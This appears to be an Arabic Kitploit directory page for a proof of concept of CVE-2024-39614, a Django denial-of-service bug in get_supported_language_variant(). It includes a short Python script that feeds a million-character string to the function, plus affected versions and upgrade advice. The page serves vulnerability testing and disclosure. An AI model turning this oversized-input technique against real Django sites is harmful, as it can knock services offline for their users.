Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2024-39614 — إثبات المفهوم لـ CVE-2024-39614، ثغرة رفض الخدمة في Django. يوضح استنزاف الموارد عبر سلاسل طويلة في get_supported_language_variant()، مما يؤثر على Django قبل 5.0.7 و4.2.14. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/-cve-2024-39614
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراق
GitHubabdurahmon3236/-cve-2024-39614

-CVE-2024-39614

إثبات المفهوم لـ CVE-2024-39614، ثغرة رفض الخدمة في Django. يوضح استنزاف الموارد عبر سلاسل طويلة في get_supported_language_variant()، مما يؤثر على Django قبل 5.0.7 و4.2.14.

عرض المستودع
11منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لثغرة حرمان من الخدمة في Django

يحتوي هذا المستودع على سكريبت إثبات المفهوم (PoC) يوضح ثغرة حرمان من الخدمة (DoS) في إصدارات Django 5.0 قبل 5.0.7 و 4.2 قبل 4.2.14. تكمن الثغرة في الدالة get_supported_language_variant()، والتي تكون عرضة لهجوم حرمان من الخدمة عند معالجة سلاسل طويلة جدًا تحتوي على أحرف محددة.

جدول المحتويات

  • وصف الثغرة
  • الإعداد والاستخدام
    • سكريبت إثبات المفهوم
  • اعتبارات هامة
  • التخفيف

وصف الثغرة

CVE-ID: (معلّق)

نظرة عامة: الدالة get_supported_language_variant() في إصدارات Django 5.0 قبل 5.0.7 و 4.2 قبل 4.2.14 معرضة لهجوم حرمان من الخدمة. يمكن استغلال هذه الدالة عن طريق إرسال سلاسل طويلة جدًا تحتوي على أحرف محددة، مما قد يؤدي إلى استنزاف الموارد وبالتالي حالة حرمان من الخدمة.

الإصدارات المتأثرة:

  • Django 5.0 قبل 5.0.7
  • Django 4.2 قبل 4.2.14

الإصدارات المُصحَّحة:

  • Django 5.0.7
  • Django 4.2.14

الإعداد والاستخدام

المتطلبات الأساسية

  • Python 3.x
  • Django مثبت (pip install django)

سكريبت إثبات المفهوم

يوضح هذا السكريبت كيف يمكن للمهاجم استغلال الثغرة عن طريق إرسال سلسلة طويلة جدًا إلى الدالة get_supported_language_variant().

احفظ السكريبت التالي كـ dos_poc.py وقم بتشغيله.

root@kitploit:~
import django
from django.utils.translation import get_supported_language_variant

# Check Django version
if django.VERSION < (4, 2, 14) or (5, 0) <= django.VERSION < (5, 0, 7):
    print("[-] This Django version is vulnerable to the DoS attack.")
else:
    print("[+] This Django version is not vulnerable. Please use a vulnerable version for testing.")

# Generate a very long string containing specific characters
very_long_string = 'a' * 1000000 + '!'  # Adjust the length and content as necessary

def test_dos_vulnerability():
    try:
        # Trigger the vulnerability
        get_supported_language_variant(very_long_string)
        print("[+] Successfully called get_supported_language_variant with a very long string.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    test_dos_vulnerability()

الشرح

  1. التحقق من إصدار Django: يتحقق السكريبت أولاً مما إذا كان إصدار Django المثبت معرضًا لهجوم حرمان الخدمة أم لا.
  2. توليد سلسلة طويلة جدًا: يتم توليد سلسلة طويلة جدًا تحتوي على أحرف محددة. قم بتعديل الطول والمحتوى حسب الحاجة لتفعيل الثغرة.
  3. دالة الاختبار: تقوم الدالة test_dos_vulnerability() باستدعاء get_supported_language_variant() مع السلسلة الطويلة جدًا لاختبار الثغرة.
  4. تشغيل السكريبت: عند التنفيذ، سيحاول السكريبت استغلال الثغرة وطباعة النتائج.

اعتبارات هامة

  • الأذونات: تأكد من أن لديك إذنًا صريحًا لاختبار هذه الثغرة على النظام المستهدف. الاختبار غير المصرح به غير قانوني وغير أخلاقي.
  • بيئة الاختبار: قم بإجراء هذا الاختبار في بيئة خاضعة للسيطرة لتجنب التأثير على أنظمة الإنتاج.
  • استهلاك الموارد: يمكن أن يستهلك هذا الإثبات موارد نظام كبيرة. راقب نظامك وكن مستعدًا لإيقاف السكريبت إذا لزم الأمر.

التخفيف

للتخفيف من هذه الثغرة، قم بالترقية إلى الإصدارات المُصحَّحة من Django:

  • Django 5.0.7
  • Django 4.2.14

اتبع تعليمات الترقية الرسمية لـ Django لتحديث تثبيت Django إلى أحدث إصدار آمن.

من خلال الحفاظ على تحديث برامجك واتباع أفضل ممارسات الأمان، يمكنك منع ثغرات مثل مشكلة حرمان الخدمة هذه في Django.

تنزيل الأداة